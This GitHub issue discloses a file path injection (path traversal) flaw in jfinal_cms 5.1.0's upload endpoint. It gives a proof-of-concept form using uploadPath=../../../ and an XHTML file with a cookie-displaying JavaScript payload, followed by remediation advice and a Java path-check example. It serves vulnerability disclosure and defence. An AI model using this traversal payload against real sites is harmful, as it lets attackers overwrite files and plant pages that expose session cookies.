
jfinal_cms 5.1.0 file path injection vulnerability #31

Open
luchua-bc opened this issue Feb 6, 2022 · 0 comments


There is a CWE-073 - file path injection vulnerability with the upload controller.

If an admin user uploads a malicious file with injected path e.g. https://<jfinal_cms.site>/jfinal_cms/system/upload?uploadPath=../../../, the application will either serve malicious web pages or overwrite important system files.

A sample page to trigger the upload functionality is as follows:

<html>
    <body>
        <form method="post" action="https://<jfinal_cms.site>/jfinal_cms/system/upload?uploadPath=../../../" enctype="multipart/form-data" id="myfile">
            <input type="file" name="file">
            <input type="submit" value="Upload">
        </form>
    </body>
</html>

The following sample XHTML file with a JavaScript payload was used to show that sensitive information, such as cookies, can be leaked:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
</head>
<body>
<script type="text/javascript">
      alert(document.cookie);
</script>
<h1>POC</h1>
</body>
</html>

The XHTML file was successfully uploaded to the webroot directory, which broke out of the intended directory /upload/jflyfox/bbs/.
[screenshot: upload_success]

Accessing the file will leak session cookies, which confirmed the file path injection vulnerability:
[screenshot: Screen Shot 2022-02-05 at 9 11 35 PM]

Unsanitized user-provided data must not be used to construct the file path. In order to prevent file path injection, it is recommended to avoid concatenating user input directly into the file path. Instead, user input should be checked against allowed (e.g. must come within user_content/) or disallowed (e.g. must not come within /internal) paths, ensuring that neither path traversal using ../ nor URL encoding is used to evade these checks.

Please consider fixing the issue. Thanks.
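One way to implement the allowed-path check recommended in the report, as an added example (not code from the jfinal_cms project): resolve the untrusted uploadPath against the configured upload directory, normalize it, and refuse any target that no longer starts with that directory. The class name SafeUploadPath, the base directory and the parameter names are assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Resolves an upload target inside a fixed base directory and rejects any
 * uploadPath that escapes it. Added example, not jfinal_cms code; the base
 * directory and parameter names are assumptions.
 */
public final class SafeUploadPath {

    private SafeUploadPath() {}

    /**
     * @param baseDir  the only directory uploads may land in, e.g. <webroot>/upload/jflyfox/bbs
     * @param userPath the raw uploadPath request parameter (untrusted)
     * @param fileName the client-supplied file name (untrusted)
     * @return the normalized target path, guaranteed to be under baseDir
     * @throws IllegalArgumentException if the request would escape baseDir
     */
    public static Path resolve(Path baseDir, String userPath, String fileName) {
        // Normalize the base once so "." or ".." in the configured path cannot
        // weaken the prefix comparison below.
        Path base = baseDir.toAbsolutePath().normalize();

        // The container has already URL-decoded the parameter once; a leftover
        // "%2e%2e" or a NUL byte is an attempt to survive a naive "../" filter,
        // so reject rather than try to decode again.
        if (userPath.indexOf('\0') >= 0 || userPath.contains("%")
                || fileName.indexOf('\0') >= 0 || fileName.contains("%")) {
            throw new IllegalArgumentException("encoded or NUL characters in upload path");
        }

        // Keep only the final segment of the file name; browsers may send a full path.
        Path leafPath = Paths.get(fileName).getFileName();
        String leaf = leafPath == null ? "" : leafPath.toString();
        if (leaf.isEmpty() || leaf.equals(".") || leaf.equals("..")) {
            throw new IllegalArgumentException("invalid file name");
        }

        // Resolve relative to the base, then collapse "." and ".." segments.
        // An absolute userPath such as "/etc" replaces the base entirely and
        // therefore also fails the prefix check.
        Path target = base.resolve(userPath).resolve(leaf).normalize();

        if (!target.startsWith(base)) {
            throw new IllegalArgumentException("uploadPath escapes the upload directory: " + userPath);
        }
        return target;
    }
}
```

With this check, uploadPath=../../../ resolves above the base directory and is rejected before any file is written; a rejected request should be logged and answered with a 400 rather than silently remapped.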
